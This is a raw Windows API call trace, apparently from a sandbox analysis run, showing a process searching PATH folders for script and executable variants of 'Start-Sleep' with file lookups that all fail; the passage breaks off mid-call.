1 [0225.614] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.614] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x1a [0225.614] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0225.614] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.614] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.615] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.VBE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.616] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.616] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.616] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.JS", lpFilePart=0x0) returned 0x19 [0225.616] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0225.616] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.616] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.617] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.JS", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.618] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.618] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.618] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x1a [0225.618] GetFullPathNameW (in: lpFileName="Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x34 [0225.618] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.618] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.619] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.JSE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.619] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.620] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.620] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x1a [0225.620] GetFullPathNameW (in: lpFileName="Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x34 [0225.620] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.620] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.621] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.WSF", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.621] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.622] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.622] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x1a [0225.622] GetFullPathNameW (in: lpFileName="Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x34 [0225.622] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.622] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.623] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.WSH", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.623] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.623] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.623] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x1a [0225.624] GetFullPathNameW (in: lpFileName="Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x34 [0225.624] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.624] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.625] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.MSC", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.625] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.625] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.625] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x1a [0225.625] GetFullPathNameW (in: lpFileName="Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x34 [0225.625] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.626] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.626] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.CPL", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.627] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.627] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0225.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.627] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0225.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep", lpFilePart=0x0) returned 0x16 [0225.627] GetFullPathNameW (in: lpFileName="Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpFilePart=0x0) returned 0x30 [0225.627] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.627] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.628] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.629] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0225.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x28 [0225.629] GetFullPathNameW (in: lpFileName="Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x34 [0225.629] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.629] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.630] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.ps1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.631] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0225.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.631] GetFullPathNameW (in: 